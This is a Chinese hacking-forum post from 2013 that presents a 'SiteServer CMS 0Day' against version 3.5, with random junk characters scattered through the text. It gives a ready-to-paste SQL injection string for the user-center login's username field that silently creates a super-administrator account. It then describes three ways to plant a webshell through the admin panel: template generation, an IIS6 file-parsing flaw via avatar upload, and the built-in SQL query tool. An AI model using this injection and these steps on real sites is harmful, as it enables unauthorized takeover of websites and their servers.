找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2263|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版) E9 W$ q' Y' C  f
7 U$ R& Y8 H2 `2 z7 p: j. s) |
stieserver官网:www.siteserver.cn+ k) F7 ^* T) M* U: ^
& S- W6 A9 K4 ^8 }8 V3 w$ h

1 s/ K6 _0 g1 l5 k. D7 D' t% C% F3 [: y! g9 B
EXP:
0 T% ?3 L! n: _3 @" T. f! m) t5 i7 x
直接访问UserCenter/login.aspx
8 t  E& |' z7 {" ^% w1 _& A- v+ T- ~  i
8 g: L" C' X8 c9 ?( r7 c- c+ j
6 s. v4 _  u: o
用户名处输入:
: h# T# o: Y& X# V3 _' v9 u$ `: ^3 e: R. M# l3 W! `
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--7 w- b7 w' X2 p7 {( b8 F
7 {+ p2 t/ P; I9 a  H+ Q
: U9 N7 b$ K, H& v# g. Y
( p( p7 P" J5 K2 y6 n" Z
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
; m, V1 W6 I5 B) P! g- i' e+ I% q4 e5 `
2 N; J8 a+ L  y8 R

5 n0 n: v7 z. ]- K' w' A% Q2 Z之后再访问后台SiteServer/login.aspx用插入的用户登陆1 F3 F  l! Y3 t* A6 l$ C& x( i- ^
/ s" R- ?  S" G% M; B. e! `5 B

0 x5 t8 ?- L0 X3 A* w: [
" t% F4 }7 Q' [+ a后台拿webshell的三种方法:
% s8 R3 T- \/ S2 _8 f, B# ~, d4 }) L: |
一、
) l- p! m8 T1 S4 q' T+ d8 P
" n+ |; W+ [0 _4 W; r) l$ C: l站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 q: N  |* a. ?/ `/ U2 [
. a7 y, M3 d2 U8 G, W" t二、
7 u5 k6 a# T2 Y! Z/ L9 U; K' i4 S* E8 E, }. X! ^
成员权限-》添加用户-》用户名为:1.asp2 @5 ?8 {! v6 N
$ q0 u: [0 Z/ F; h
http://127.0.0.1/usercenter/
: H- d! P6 E  v; C7 n4 ?1 ]- ^7 N2 v+ k0 z
% h* K$ n+ d* ]用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
, C6 [6 v- t8 }( G: h/ D
4 x! a3 K& M  P, n5 o(ps:后台添加用户时不会验证是否含有非法字符)
, W# _6 i  i6 t8 s/ @0 K' b0 N! S5 q  }3 f5 l7 S7 s
三、4 o$ q+ m' Z' k" O$ [: P2 F

/ R; {+ q; D$ I7 C4 u系统工具-》实用工具-》机器参数查看0 _' l$ G( t  W% q
可以看到数据库类型、名称,WEB路径8 _. K# e7 d& m/ X& C( v; ^
) T! F' A" T0 G: x
系统工具-》数据库工具-》SQL语句查询
# b) E9 v/ c' }/ m$ y& f. t这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
  T9 p0 B& ^7 ]# p# m* U
% s: p" ]3 Z7 E: ]2 ~1 b1 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表